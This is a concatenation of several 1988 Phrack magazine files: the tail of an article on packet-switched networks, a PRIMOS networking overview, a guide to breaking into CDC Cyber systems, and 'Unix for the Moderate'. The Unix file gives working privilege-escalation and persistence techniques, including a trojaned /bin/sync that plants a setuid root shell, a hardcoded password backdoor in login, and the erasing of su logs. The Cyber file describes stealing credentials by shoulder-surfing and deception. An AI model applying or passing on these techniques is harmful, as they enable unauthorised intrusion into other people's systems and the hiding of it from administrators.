PSNs and packet switches, access to almost any host, access to normal circuit
switched telephone-reachable hosts via an outdial, and with an NUI (Network
User Identity - Login and password entered at the @ prompt on Telenet),
unlimited access to any NUA, reverse-charged or not.
Due to the recent abuse of long distance companies, the use of codes when
making free calls is getting to be more and more hazardous. You may ask, 'Is
there any resort to making free calls without using codes, and without using a
blue box?' The answer is yes, but only when using data. With an outdial,
accessible from your local PSN port, you can make data calls with a remote
modem, almost always connected directly to a server, or a port selector. This
method of communicating is more efficient, safer, and more reliable than using
any code. Besides, with the implementation of equal access, and the
elimination of 950 ports, what choice will you have?
Some Important Networks -
As aforementioned, PSNs are not only used in the United States. They are
all over the place. In Europe, Asia, Canada, Africa, etc. This is a small
summary of some of the more popular PSNs around the world.
Country Network Name *DNIC
~~~~~~~ ~~~~~~~ ~~~~ ~~~~
Germany Datex-P 2624
Canada Datapac 3020
Italy Datex-P 0222
South Africa Saponet 0655
Japan Venus-P 4408
England Janet/PSS 2342
USA Tymnet 3106
USA Telenet 3110
USA Autonet 3126
USA RCA 3113
Australia Austpac 0505
Ireland Irepac 2724
Luxembourg Luxpac 2704
Singapore Telepac 5252
France Transpac 2080
Switzerland Telepac 2284
Sweden Telepac 2405
Israel Isranet 4251
~~~~~~~~~ ~~~~~~~ ~~~~
* - DNIC (Data Network Identification Code)
Precede DNIC and logical address with a
'0' when using Telenet.
______________________________________________________________________________
Notes On Above Networks -
Some countries may have more than one Packet Switching Network. The ones
listed are the more significant networks for each country. For example, the
United States has eleven public Packet Switching Networks, but the four I
listed are the major ones.
Several countries may also share one network, as shown above. Each country
will have equal access to the network using the basic POTS dial-up ports.
Focus On Telenet -
Since Telenet is one of the most famous, and highly used PSNs in the United
States, I thought that informing you of some of the more interesting aspects
of this network would be beneficial.
Interconnections With Other Network Types -
Packet Switched Networks are not the only type of networks which connect a
large capacity of hosts together. There are also Wide Area Networks, which
operate on a continuous link basis, rather than a packet switched basis.
These networks do not use the standardized X.25 protocol, and can only be
reached by direct dial-ups, or by connecting to a host which has network
access permissions. The point is, that if you wanted to reach, say, Arpanet
from Telenet, you would have to have access to a host which is connected to
both networks. This way, you can connect to the target host computer via
Telenet, and use the WAN via the target host.
WANs aren't the only other networks you can access. Also, connections to
other small, private, interoffice LANs are quite common and quite feasible.
Connections To International NUAs via NUIs -
When using an NUI, at the prompt, type 0+DNIC+NUA. After your connection
is established, proceed to use the system you've reached.
Private Data Networks -
Within the large Packet Switched Networks that are accessible to us there
are also smaller private networks. These networks can sometimes be very
interesting as they may contain many different systems. A way to identify a
private network is by looking at the three digit prefix. Most prefixes
accessible by Telenet are based on area codes. Private networks often have a
prefix that has nothing to do with any area code. (Ex. 322, 421, 224, 144)
Those prefixes are not real networks, just examples.
Inside these private networks, there are often smaller networks which are
connected with some type of host selector or gateway server. If you find
something like this, there may be hosts that can be accessed only by this port
selector/server, and not by the normal prefix. It is best to find out what
these other addresses translate to, in case you are not able to access the
server for some reason. That way, you always have a backup method of reaching
the target system (Usually the addresses that are accessed by a gateway
server/port selector translate to normal NUAs accessible from your Telenet
port).
When exploring a private network, keep in mind that since these networks
are smaller, they would most likely be watched more closely during business
hours then say Telenet or Tymnet. Try to keep your scanning and tinkering
down to a minimum on business hours to avoid any unnecessary trouble.
Remember, things tend to last longer if you don't abuse the hell out of them.
Summary -
I hope this file helped you out a bit, and at least gave you a general idea
of what PSNs are used for, and some of the advantages of using these networks.
If you can find something interesting during your explorations of PSNs, or
Private Data Networks, share it, and spread the knowledge around. Definitely
exploit what you've found, and use it to your advantage, but don't abuse it.
If you have any questions or comments, you reach me on -
The FreeWorld II/Central Office/Forgotten Realm/TOP.
I hope you enjoyed my file. Thanks for your time. I should be writing a
follow up article to this one as soon as I can. Stay safe..
- Epsilon
______________________________________________________________________________
- Thanks To -
Prime Suspect/Sir Qix/The Technic/Empty Promise/The Leftist
______________________________________________________________________________

246
phrack18/4.txt Normal file
View file

@ -0,0 +1,246 @@
==Phrack Inc.==
Volume Two, Issue 18, Phile #4 of 11
-------------------------------------------------------------------------
- -
- -
- PRIMOS: -
- NETWORK COMMUNICATIONS -
- -
- PRIMENET, RJE, DPTX -
- -
- -
- Presented by Magic Hasan June 1988 -
-------------------------------------------------------------------------
PRIME's uniform operating system, PRIMOS, supports a wide range of
communications products to suit any distributed processing need. The PRIMENET
distributed networking facility provides complete local and remote network
communication services for all PRIME systems. PRIME's Remote Job Entry (RJE)
products enable multi-user PRIME systems to emulate IBM, CDC, Univac,
Honeywell and ICL remote job entry terminals over synchronous communication
lines. PRIME's Distributed Processing Terminal Executive (DPTX) allows users
to construct communication networks with PRIME and IBM-compatible equipment.
PRIMENET
--------
PRIMENET provides complete local and remote network communication services
for all PRIME systems. PRIMENET networking software lets a user or process on
one PRIME system communicate with any other PRIME system in the network
without concern for any protocol details. A user can log in to any computer
in the network from any terminal in the network. With PRIMENET, networking
software processes running concurrently on different systems can communicate
interactively. PRIMENET allows transparent access to any system in the
network without burdening the user with extra commands.
PRIMENET has been designed and implemented so that user interface is simple
and transparent. Running on a remote system from a local node of the network
or accessing remote files requires no reprogramming of user applications or
extensive user training. All the intricacies and communication protocols of
the network are handled by the PRIMENET software. For both the local and
remote networks, PRIMENET will allow users to share documents, files, and
programs and use any disk or printer configured in the network.
For a local network between physically adjacent systems, PRIME offers the
high-performance microprocessor, the PRIMENET Node Controller (PNC). The
controller users direct memory access for low overhead and allows loosely
coupled nodes to share resources in an efficient manner. The PNCs for each
system are connected to each other with a coaxial cable to form a high-speed
ring network, with up to 750 feet (230 meters) between any two systems.
Any system in the PNC ring can establish virtual circuits with any other
system, making PNC-based networks "fully connected" with a direct path between
each pair of systems. The ring has sufficient bandwidth (1 MB per second) and
addressing capability to accommodate over 200 systems in a ring structure;
however, PRIMENET currently supports up to sixteen systems on a ring to
operate as a single local network.
The PRIMENET Node Controller is designed to assure continuity of operation
in the event that one of the systems fails. One system can be removed from
the network or restored to on-line status without disturbing the operations of
the other system. An active node is unaware of messages destined for other
nodes in the network, and the CPU is notified only when a message for that
node has been correctly received.
Synchronous communications over dedicated leased lines or dial-up lines is
provided through the Multiple Data Link Controller (MDLC). This controller
handles certain protocol formatting and data transfer functions normally
performed by the operating system in other computers. The controller's
microprogrammed architecture increases throughput by eliminating many tasks
from central processor overhead.
The communications controller also supports multiple protocols for
packet-switched communications with Public Data Networks such as the United
States' TELENET and TYMNET, the Canadian DATAPAC, Great Britain's
International Packet Switching Service (IPSS), France's TRANSPAC, and the
European Packet Switching Network, EURONET. Most Public Data Networks require
computers to use the CCITT X.25 protocol to deal with the management of
virtual circuits between a system and others in the network. The synchronous
communications controller supports this protocol. PRIME can provide the X.25
protocol for use with the PRIMENET networking software without modification to
the existing hardware configuration.
PRIMENET software offers three distinct sets of services. The
Inter-Program Communication Facility (IPCF) lets programs running under the
PRIMOS operating system establish communications paths (Virtual circuits) to
programs in the same or another PRIME system, or in other vendors' systems
supporting the CCITT X.25 standard for packet switching networks. The
Interactive Terminal Support (ITS) facility permits terminals attached to a
packet switching network, or to another PRIME system, to log-in to a PRIME
system with the same capabilities they would have if they were directly
attached to the system. The File Access Manager (FAM) allows terminal users
or programs running under the PRIMOS operating system to utilize files
physically stored on other PRIME systems in a network. Remote file operations
are logically transparent to the application program. This means no new
applications and commands need to be learned for network operation.
The IPCF facility allows programs in a PRIME computer to exchange data with
programs in the same computer, another PRIME computer, or another vendor's
computer, assuming that that vendor supports X.25. This feature is the most
flexible and powerful one that any network software package can provide. It
basically allows an applications programmer to split up a program, so that
different pieces of the program execute on different machines a network. Each
program component can be located close to the resource (terminals, data,
special peripherals, etc.) it must handle, decode the various pieces and
exchange data as needed, using whatever message formats the application
designer deems appropriate. The programmer sees PRIMENET's IPCF as a series
of pipes through which data can flow. The mechanics of how the data flows are
invisible; it just "happens" when the appropriate services are requested. If
the two programs happen to end up on the same machine, the IPCF mechanism
still works. The IPCF offers the following advantages:
1) The User does not need to understand the detailed
mechanisms of communications software in order to
communicate.
2) Calls are device-independent. The same program will
work over physical links implemented by the local node
controller (local network), leased lines, or a packet
network.
3) Programs on one system can concurrently communicate
with programs on other systems using a single
communications controller. PRIMENET handles all
multiplexing of communications facilities.
4) A single program can establish multiple virtual
circuits to other programs in the network.
PRIMENET's ITS facility allows an interactive terminal to have access to
any machine in the network. This means that terminals can be connected into
an X.25 packet network along with PRIME computers. Terminal traffic between
two systems is multiplexed over the same physical facilities as inter-program
data, so no additional hardware is needed to share terminals between systems.
This feature is ordinarily invisible to user programs, which cannot
distinguish data entering via a packet network from data coming in over AMLC
lines. A variant of the IPCF facility allows users to include the terminal
handling protocol code in their own virtual space, thus enabling them to
control multiple terminals on the packet network within one program.
Terminals entering PRIMOS in this fashion do not pass through the usual log-in
facility, but are immediately connected to the application program they
request. (The application program provides whatever security checking is
required.)
The result is the most effective available means to provide multi-system
access to a single terminal, with much lower costs for data communications and
a network which is truly available to all users without the expense of
building a complicated private network of multiplexors and concentrators.
By utilizing PRIMENET's File Access Manager (FAM), programs running under
PRIMOS can access files on other PRIME systems using the same mechanisms used
to access local files. This feature allows users to move from a single-system
environment to a multiple-system one without difficulty. When a program and
the files it uses are separated into two (or more) systems the File Access
Management (FAM)is automatically called upon whenever the program attempts to
use the file. Remote file operations are logically transparent to the user
or program.
When a request to locate a file or directory cannot be satisfied locally,
the File Access Manager is invoked to find the data elsewhere in the network.
PRIMOS initiates a remote procedure call to the remote system and suspends the
user. This procedure call is received by an answering slave process on the
remote system, which performs the requested operation and returns data via
subroutine parameters. The slave process on the remote system is dedicated to
its calling master process (user) on the local system until released. A
master process (user) can have a slave process on each of several remote
systems simultaneously. This means that each user has a dedicated connection
for the duration of the remote access activity so many requests can be
handled in parallel.
FAM operation is independent of the specific network hardware connecting
the nodes. There is no need to rewrite programs or learn new commands when
moving to the network environment. Furthermore, the user need only be
logged-in to one system in the network, regardless of the location of the
file. Files on the local system or remote systems can be accessed dynamically
by file name within a program, using the language-specific open and close
statements. No external job control language statements are needed for the
program to access files. Inter-host file transfers and editing can be
performed using the same PRIMOS utilities within the local system by
referencing the remote files with their actual file names.
REMOTE JOB ENTRY
----------------
PRIME's Remote Job Entry (RJE) software enables a PRIME system to emulate
IBM, CDC, Univac, Honeywell and ICL remote job entry terminals over
synchronous communication lines. PRIME's RJE provides the same communications
and peripheral support as the RJE terminals they emulate, appearing to the
host processor to be those terminals. All PRIME RJE products provide three
unique benefits:
* PRIME RJE is designed to communicate with multiple
remote sites simultaneously.
* PRIME RJE enables any terminal connected to a PRIME system to
submit jobs for transmission to remote processors, eliminating the
requirement for dedicated terminals or RJE stations at each
location.
* PRIME's mainframe capabilities permit concurrent running of RJE
emulators, program development and production work.
PRIME's RJE supports half-duplex, point-to-point, synchronous
communications and operates over dial-up and dedicated lines. It is fully
supported by the PRIMOS operating system.
DISTRIBUTED PROCESSING TERMINAL EXECUTIVE (DPTX)
------------------------------------------------
PRIME's Distributed Processing Terminal Executive (DPTX) allows users to
construct communication networks with PRIME and IBM-compatible equipment.
DPTX conforms to IBM 3271/3277 Display System protocols, and can be integrated
into networks containing IBM mainframes, terminals and printers without
changing application code or access methods and operates under the PRIMOS
operating system.
DPTX is compatible with all IBM 370 systems and a variety of access methods
and teleprocessing monitors: BTAM, TCAM, VTAM, IMS/VS, CIC/VS, and TSO. They
provide transmission speeds up to 9600 bps using IBM's Binary Synchronous
Communications (BSC) protocol.
DPTX is comprised of three software modules that allow PRIME systems to
emulate and support IBM or IBM compatible 3271/3277 Display Systems. One
module, Data Stream Compatibility (DPTX/DSC), allows the PRIME system to
emulate the operation of a 3271 on the IBM system. This enables both terminal
user and application programs (interactive or batch) on the PRIME System to
reach application programs on an IBM mainframe. A second module, Terminal
Support Facility (DPTX/TSF), allows a PRIME system to control a network of IBM
3271/3277 devices. This enables terminal users to reach application programs
on a PRIME computer. The third module, Transparent Connect Facility
(DPTX/TCF), combines the functions of modules one and two with additional
software allowing 3277 terminal users to to reach programs on a IBM mainframe,
even though the terminal subsystem is physically connected to a PRIME system,
which is connected to an IBM system.
PRIMOS offers a variety of different Communication applications. Being
able to utilize these applications to their fullest extent can make life easy
for a Primos "enthusiast." If you're a beginner with Primos, the best way to
learn more, as with any other system, is to get some "hands-on" experience.
Look forward to seeing some beginner PRIMOS files in the near future. -MH
------------------------------------------------------------------------------
Special thanks to PRIME INC. for unwittingly providing the text for this
article.
===============================================================================

356
phrack18/5.txt Normal file
View file

@ -0,0 +1,356 @@
==Phrack Inc.==
Volume Two, Issue 18, Phile #5 of 11
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-= =-
-= Hacking Control Data Corporation's Cyber =-
-= =-
-= Written by Phrozen Ghost, April 23, 1988 =-
-= =-
-= Exclusively for Phrack Magazine =-
-= =-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
This article will cover getting into and using NOS (Networking Operating
System) version 2.5.2 running on a Cyber 730 computer. Cybers generally run
this operating system so I will just refer to this environ- ment as Cyber.
Also, Cyber is a slow and outdated operating system that is primarily used
only for college campuses for running compilers. First off after you have
scanned a bunch of carriers you will need to know how Cyber identifies itself.
It goes like this:
WELCOME TO THE NOS SOFTWARE SYSTEM.
COPYRIGHT CONTROL DATA 1978, 1987.
88/02/16. 02.36.53. N265100
CSUS CYBER 170-730. NOS 2.5.2-678/3.
FAMILY:
You would normally just hit return at the family prompt. Next prompt is:
USER NAME:
Usernames are in the format abcdxxx where a is the location of where the
account is being used from (A-Z). the b is a grouping specifying privs and
limits for the account- usually A-G -where A is the lowest access. Some
examples of how they would be used in a college system:
A = lowest access - class accounts for students
B = slightly higher than A (for students working on large projects)
C = Much higher limits, these accounts are usually not too hard to get and
they will normally last a long time! Lab assistants use these.
D = Instructors, Lecturers, Professors.. etc..
E = same... (very hard to get these!)
The C and D positions are usually constant according to the groupings.
For example, a class would have accounts ranging from NADRAAA-AZZ
^^^ ^^^
These can also be digits
There are also special operator accounts which start with digits instead of
numbers. (ie 7ETPDOC) These accounts can run programs such as the monitor
which can observe any tty connected to the system...
The next prompt will be for the password, student account passwords cannot be
changed and are 7 random letters by default, other account passwords can be
changed. You get 3 tries until you are logged out. It is very difficult if
not impossible to use a brute force hacker or try to guess someone's account..
so how do you get on? Here's one easy way... Go down to your local college
(make sure they have a Cyber computer!) then just buy a class catalog (they
only cost around 50 cents) or you could look, borrow, steal someone else's...
then find a pascal or fortran class that fits your schedule! You will only
have to attend the class 3 or 4 times max. Once you get there you should have
no trouble, but if the instructor asks you questions about why you are not on
the roll, just tell him that you are auditing the class (taking it without
enrolling so it won't affect your GPA). The instructor will usually pass out
accounts on the 3rd or 4th day of class.. this method also works well with
just about any system they have on campus! Another way to get accounts is to
go down to the computer lab and start snooping! Look over someone's shoulder
while they type in their password, or look thru someone's papers while they're
in the bathroom, or look thru the assistants desk while he is helping
someone... (I have acquired accounts both ways, and the first way is a lot
easier with less hassles) Also, you can use commas instead of returns when
entering username and password.
Example: at the family prompt, you could type ,nadrajf,dsfgkcd
or at the username prompt nadrajf,dsfgkcd
After you enter your info, the system will respond with:
JSN: APXV, NAMIAF
/
The 'APXV, NAMIAF' could be different depending on what job you were attached
to. The help program looks a lot neater if you have vt100 emulation, if you
do, type [screen,vt100] (don't type the brackets! from now on, all commands I
refer to will be enclosed in brackets) Then type help for an extensive
tutorial or a list of commands. Your best bet at this point is to buy a quick
reference guide at the campus because I am only going to describe the most
useful commands. The / means you are in the batch subsystem, there are usually
6 or 7 other subsystems like basic, fortran, etc... return to batch mode by
typing [batch].
Some useful commands:
CATLIST - will show permanent files in your directory.
ENQUIRE,F - displays temporary files in your workspace.
LIMITS - displays your privileges.
INFO - get more on-line help.
R - re-execute last command.
GET,fn - loads fn into the local file area.
CHANGE - change certain specs on a file.
PERMIT - allow other users to use one of your files.
REWIND,* - rewinds all your local files.
NEW,fn - creates new file.
PURGE - deletes files.
LIST,F=fn - list file.
UPROC - create an auto-execute procedure file.
MAIL - send/receive private mail.
BYE - logoff.
Use the [helpme,cmd] command for the exact syntax and parameters of these
commands. There are also several machine specific 'application' programs such
as pascal, fortran, spitbol, millions of others that you can look up with the
INFO command... there are also the text editors; edit, xedit, and fse (full
screen editor). Xedit is the easiest to use if you are not at a Telray 1061
terminal and it has full documentation. Simply type [xedit,fn] to edit the
file 'fn'.
Special control characters used with Cyber:
Control S and Control Q work normally, the terminate character is Control T
followed by a carriage return. If you wanted to break out of an auto-execute
login program, you would have to hit ^T C/R very fast and repetitively in
order to break into the batch subsystem. Control Z is used to set environment
variables and execute special low level commands, example: [^Z TM C/R] this
will terminate your connection...
So now you're thinking, what the hell is Cyber good for? Well, they won't
have any phone company records, and you can't get credit information from one,
and I am not going to tell you how to crash it since crashing systems is a
sin. There are uses for a Cyber though, one handy use is to set up a chat
system, as there are normally 30-40 lines going into a large university Cyber
system. I have the source for a chat program called the communicator that I
will be releasing soon. Another use is some kind of underground information
exchange that people frequently set up on other systems, this can easily be
done with Cyber.
Procedure files:
A procedure file is similar to a batch file for MS-DOS, and a shell script for
UNIX. You can make a procedure file auto-execute by using the UPROC command
like [uproc,auto] will make the file 'auto', auto execute. There is also a
special procedure file called the procfile in which any procedure may be
accessed by simply a - in front of it. If your procfile read:
.proc,cn.
.* sample procedure
$catlist/un=7etpdoc.
$exit.
then you could simply type -cn and the / prompt and it would execute the
catlist command. Now back to uprocs, you could easily write a whole BBS in a
procedure file or say you wanted to run a chat system and you did not want
people to change the password on your account, you could do this:
.proc,chat,
PW"Password: "=(*A).
$ife,PW="cyber",yes.
$chat.
$revert.
$bye.
$else,yes.
$note./Wrong password, try again/.
$revert.
$bye.
$endif,yes.
This procedure will ask the user for a password and if he doesn't type "cyber"
he will be logged off. If he does get it right then he will be dumped into
the chat program and as soon as he exits the chat program, he will be logged
off. This way, the user cannot get into the batch subsystem and change your
password or otherwise screw around with the account. The following is a
listing of the procfil that I use on my local system, it has a lot of handy
utilities and examples...
---- cut here ----
.PROC,B.
.******BYE******
$DAYFILE.
$NOTE.//////////////////////////
$ASCII.
$BYE.
$REVERT,NOLIST.
#EOR
.PROC,TIME.
.******GIVES DAY AND TIME******
$NOTE./THE CURRENT DAY AND TIME IS/
$FIND,CLOCK./
$REVERT,NOLIST.
#EOR
.PROC,SIGN*I,IN.
.******SIGN PRINT UTILITY******.
$GET,IN.
$FIND,SIGN,#I=IN,#L=OUT.
$NOTE./TO PRINT, TYPE: PRINT,OUT,CC,RPS=??/
$REVERT,NOLIST.
#EOR
.PROC,TA.
.******TALK******
$SACFIND,AID,COMM.
$REVERT,NOLIST.
#EOR
.PROC,DIR,UN=,FILE=.
.******DIRECTORY LISTING OF PERMANENT FILES******
$GET(ZZZZDIR=CAT/#UN=1GTL0CL)
ZZZZDIR(FILE,#UN=UN)
$RETURN(ZZZZDIR)
$REVERT,NOLIST.
#EOR
.PROC,Z19.
.******SET SCREEN TO Z19******
$SCREEN,Z19.
$NOTE./SCREEN,Z19.
$REVERT,NOLIST.
#EOR
.PROC,VT.
.******SET SCREEN TO VT100******
$SCREEN,VT100.
$NOTE./SCREEN,VT100.
$REVERT,NOLIST
#EOR
.PROC,SC.
.******SET SCREEN TO T10******
$SCREEN,T10.
$NOTE./SCREEN,T10.
$REVERT,NOLIST
#EOR
.PROC,C.
.******CATLIST******
$CATLIST.
$REVERT,NOLIST.
#EOR
.PROC,CA.
.******CATLIST,LO=F******
$CATLIST,LO=F.
$REVERT,NOLIST.
#EOR
.PROC,MT.
.******BBS******
$SACFIND,AID,MTAB.
$REVERT,NOLIST.
#EOR
.PROC,LI,FILE=.
.******LIST FILE******
$GET,FILE.
$ASCII.
$COPY(FILE)
$REVERT.
$EXIT.
$CSET(NORMAL)
$REVERT,NOLIST. WHERE IS THAT FILE??
#EOR
.PROC,LOCAL.
.******DIRECTORY OF LOCAL FILES******
$RETURN(PROCLIB,YYYYBAD,YYYYPRC)
$GET(QQQFILE=ENQF/UN=1GTL0CL)
QQQFILE.
$REVERT,NOLIST.
$EXIT.
$REVERT. FILES ERROR
#EOR
.PROC,RL.
.******RAISE LIMITS******
$SETASL(*)
$SETJSL(*)
$SETTL(*)
$CSET(ASCII)
$NOTE./ Limits now at max validated levels.
$CSET(NORMAL)
$REVERT,NOLIST.
#EOR
.PROC,CL.
.******CLEAR******
$CLEAR,*.
$CSET(ASCII)
$NOTE./LOCAL FILE AREA CLEARED
$REVERT,NOLIST.
#EOR
.PROC,P,FILE=THING,LST=LIST.
.***********************************************************
$CLEAR.
$GET(FILE)
$PASCAL4,FILE,LST.
$REVERT.
$EXIT.
$REWIND,*.
$CSET(ASCII)
$COPY(LIST)
$CSET(NORMAL)
$REVERT,NOLIST.
#EOR
.PROC,RE.
.******REWIND******
$REWIND,*.
$CSET(ASCII)
$NOTE./REWOUND.
$REVERT,NOLIST.
#EOR
.PROC,FOR,FILE,LST=LIST.
.********************************************************************
$CLEAR.
$GET(FILE)
$FTN5,I=FILE,L=LST.
$REPLACE(LST=L)
$CSET(ASCII)
$REVERT. Fortran Compiled
$EXIT.
$REWIND,*.
$COPY(LST)
$REVERT. That's all folks.
#EOR
.PROC,WAR.
.******WARBLES******
$SACFIND,AID,WAR.
$REVERT,NOLIST.
#EOR
.PROC,M.
.******MAIL/CHECK******
$MAIL/CHECK.
$REVERT,NOLIST.
#EOR
.PROC,MA.
.******ENTER MAIL******
$MAIL.
$REVERT,NOLIST.
#EOR
.PROC,HE,FILE=SUMPROC,UN=.
.******HELP FILE******
$GET,FILE/#UN=UN.
$COPY(FILE)
$REVERT.
$EXIT.
$REVERT,NOLIST.
#EOR
.PROC,DYNAMO.
.******WHO KNOWS??******
$GET,DYNMEXP/UN=7ETPDOC.
$SKIPR,DYNMEXP.
$COPYBR,DYNMEXP,GO.
$FIND,DYNAMO,GO.
$REVERT,NOLIST.
#EOR
#EOR
#EOI
---- cut here ----
I have covered procfil's fairly extensively as I think it is the most useful
function of Cyber for hackers. I will be releasing source codes for several
programs including 'the communicator' chat utility, and a BBS program with a
full message base. If you have any questions about Cyber or you have gotten
into one and don't know what to do, I can be contacted at the Forgotten Realm
BBS or via UUCP mail at ...!uunet!ncoast!ghost.
Phrozen Ghost
===============================================================================

244
phrack18/6.txt Normal file
View file

@ -0,0 +1,244 @@
==Phrack Inc.==
Volume Two, Issue 18, Phile #6 of 11
------------------------------------------------------------------------------
Unix for the Moderate
-------------------------------------------------------------------------------
By: The Urvile, Necron 99, and a host of me.
-------------------------------------------------------------------------------
Disclaimer:
This is mainly for system five. I do reference BSD occasionally, but I
mark those. All those little weird brands (i.e., DEC's Ultrix, Xenix, and
so on) can go to hell.
Security: (Improving yours.)
-Whenever logging onto a system, you should always do the following:
$ who -u
$ ps -ef
$ ps -u root
or BSD:
$ who; w; ps uaxg
This prints out who is on, who is active, what is going on presently,
everything in the background, and so on.
And the ever popular:
$ find / -name "*log*" -print
This lists out all the files with the name 'log' in it. If you do find a
process that is logging what you do, or an odd log file, change it as soon
as you can.
If you think someone may be looking at you and you don't want to leave
(Useful for school computers) then go into something that allows shell
breaks, or use redirection to your advantage:
$ cat < /etc/passwd
That puts 'cat' on the ps, not 'cat /etc/passwd'.
If you're running a setuid process, and don't want it to show up on a ps
(Not a very nice thing to have happen), then:
$ super_shell
# exec sh
Runs the setuid shell (super_shell) and puts something 'over' it. You may
also want to run 'sh' again if you are nervous, because if you break out of
an exec'ed process, you die. Neat, huh?
Improving your id:
-First on, you should issue the command 'id' & it will tell you you your
uid and euid. (BSD: whoami; >/tmp/xxxx;ls -l /tmp/xxxx will tell you your
id [whoami] and your euid [ls -l].), terribly useful for checking on setuid
programs to see if you have root euid privs. Also, do this:
$ find / -perm -4000 -exec /bin/ls -lad {} ";"
Yes, this finds and does an extended list of all the files that have the
setuid bit on them, like /bin/login, /bin/passwd, and so on. If any of
them look nonstandard, play with them, you never can tell what a ^| will do
to them sometimes. Also, if any are writeable and executable, copy sh over
them, and you'll have a setuid root shell. Just be sure to copy whatever
was there back, otherwise your stay will probably be shortened a bit.
-What, you have the bin passwd?
Well, game over. You have control of the system. Everything in the bin
directory is owned by bin (with the exception of a few things), so you can
modify them at will. Since cron executes a few programs as root every once
in a while, such as /bin/sync, try this:
main()
{
if (getuid()==0 || getuid()==0) {
system("cp /bin/sh /tmp/sroot");
system("chmod 4777 /tmp/sroot"); }
sync();
}
$ cc file.c
$ cp /bin/sync /tmp/sync.old
$ mv a.out /bin/sync
$ rm file.c
Now, as soon as cron runs /bin/sync, you'll have a setuid shell in
/tmp/sroot. Feel free to hide it.
-the 'at' & 'cron' commands:
Look at the 'at' dir. Usually /usr/spool/cron/atjobs. If you can run 'at'
(check by typing 'at'), and 'lasttimedone' is writable, then: submit a
blank 'at' job, edit 'lastimedone' to do what you want it to do, and move
lasttimedone over your entry (like 88.00.00.00). Then the commands you put
in lasttimedone will be ran as that file's owner. Cron: in
/usr/spool/cron/cronjobs, there are a list of people running cron jobs.
Cat root's, and see if he runs any of the programs owned by you (Without
doing a su xxx -c "xxx"). For matter, check all the crons. If you can
take one system login, you should be able to get the rest, in time.
-The disk files.
These are rather odd. If you have read permission on the disks in /dev,
then you can read any file on the system. All you have to do is find it in
there somewhere. If the disk is writeable, if you use /etc/fsbd, you can
modify any file on the system into whatever you want, such as by changing
the permissions on /bin/sh to 4555. Since this is pretty difficult to
understand (and I don't get it fully), then I won't bother with it any
more.
-Trivial su.
You know with su you can log into anyone else's account if you know their
passwords or if you're root. There are still a number of system 5's that
have uid 0, null passwd, rsh accounts on them. Just be sure to remove your
entry in /usr/adm/sulog.
-Trojan horses? On Unix?
Yes, but because of the shell variable PATH, we are generally out of luck,
because it usually searches /bin and /usr/bin first. However, if the first
field is a colon, files in the present directory are searched first. Which
means if you put a modified version of 'ls' there, hey. If this isn't the
case, you will have to try something more blatant, like putting it in a
game (see Shooting Shark's file a while back). If you have a system login,
you may be able to get something done like that. See cron.
Taking over:
Once you have root privs, you should read all the mail in /usr/mail, just
to sure nothing interesting is up, or anyone is passing another systems
passwds about. You may want to add another entry to the passwd file, but
that's relatively dangerous to the life of your machine. Be sure not to
have anything out of the ordinary as the entry (i.e., No uid 0).
Get a copy of the login program (available at your nearest decent BBS, I
hope) of that same version of Unix, and modify it a bit: on system 5,
here's a modification pretty common: in the routine to check correct
passwds, on the line before the actual pw check, put a if
(!(strcmp(pswd,"woof"))) return(1); to check for your 'backdoor', enabling
you to log on as any valid user that isn't uid 0 (On system 5).
Neato things:
-Have you ever been on a system that you couldn't get root or read the
Systems/L.sys file? Well, this is a cheap way to overcome it: 'uuname'
will list all machines reachable by your Unix, then (Assuming they aren't
Direct, and the modem is available):
$ cu -d host.you.want [or]
$ uucico -x99 -r1 -shost.you.want
Both will do about the same for us. This will fill your screen with lots
of trivial material, but will eventually get to the point of printing the
phone number to the other system. -d enables the cu diagnostics, -x99
enables the uucico highest debug, and -R1 says 'uucp master'.
Back a year or two, almost everywhere had their uucp passwd set to the same
thing as their nuucp passwd (Thanks to the Systems file), so it was a
breeze getting in. Even nowadays, some places do it.. You never can tell.
-Uucp:
I personally don't like the uucp things. Uucico and uux are limited by the
Permissions file, and in most cases, that means you can't do anything
except get & take from the uucppublic dirs. Then again, if the
permission/L.cmd is blank, you should be able to take what files that you
want. I still don't like it.
-Sending mail:
Sometimes, the mail program checks only the shell var LOGNAME, so change
it, export it, and you may be able to send mail as anyone. (Mainly early
system 5's.)
$ LOGNAME="root";export LOGNAME
-Printing out all the files on the system:
Useful if you're interested in the filenames.
$ find / -print >file_list&
And then do a 'grep text file_list' to find any files with 'text' in their
names. Like grep [.]c file_list, grep host file_list....
-Printing out all restricted files:
Useful when you have root. As a normal user, do:
$ find / -print >/dev/null&
This prints out all nonaccessable directories, so become root and see what
they are hiding.
-Printing out all the files in a directory:
Better looking than ls -R:
$ find . -print
It starts at the present dir, and goes all the way down. Catches all
'.files', too.
-Rsh:
Well in the case of having an account with rsh only, check your 'set'. If
SHELL is not /bin/sh, and you are able to run anything with a shell escape
(ex, ed, vi, write, mail...), you should be put into sh if you do a '!sh'.
If you have write permission on your .profile, change it, because rsh is
ran after checking profile.
-Humor:
On a system 5, do a:
$ cat "food in cans"
or on a csh, do:
% hey unix, got a match?
Well, I didn't say it was great.
Password hacking:
-Salt:
In a standard /etc/passwd file, passwords are 13 characters long. This is
an 11 char encrypted passwd and a 2 char encryption modifier (salt), which
is used to change the des algorithm in one of 4096<?> ways. Which means
there is no decent way to go and reverse hack it. Yet.
On normal system 5 Unix, passwords are supposed to be 6-8 characters long
and have both numeric and alphabetic characters in them, which makes a
dictionary hacker pretty worthless. However, if a user keeps insisting his
password is going to be 'dog,' usually the system will comply (depending on
version). I have yet to try it, but having the hacker try the normal
entry, and then the entry terminated by [0-9] is said to have remarkable
results, if you don't mind the 10-fold increase in time.
Final notes:
Yes, I have left a lot out. That seems to be the rage nowadays.. If you
have noticed something wrong, or didn't like this, feel free to tell me.
If you can find me.
-------------------------------------------------------------------------------
Hi Ho. Here ends part one. <Of one?>
-------------------------------------------------------------------------------
Produced and directed by: Urvile & Necron 99
----------------------------------------------------------- (c) ToK inc., 1988

480
phrack18/7.txt Normal file
View file

@ -0,0 +1,480 @@
==Phrack Inc.==
Volume Two, Issue 18, Phile #7 of 11
+--------------------------------------+
| "Unix System Security Issues" |
| Typed by: |
| Whisky |
| (from Holland, Europe) |
+--------------------------------------+
| From |
| Information Age |
| Vol. 11, Number 2, April 1988 |
| Written By: |
| Michael J. Knox and Edward D. Bowden |
+--------------------------------------+
Note: This file was sent to me from a friend in Holland. I felt
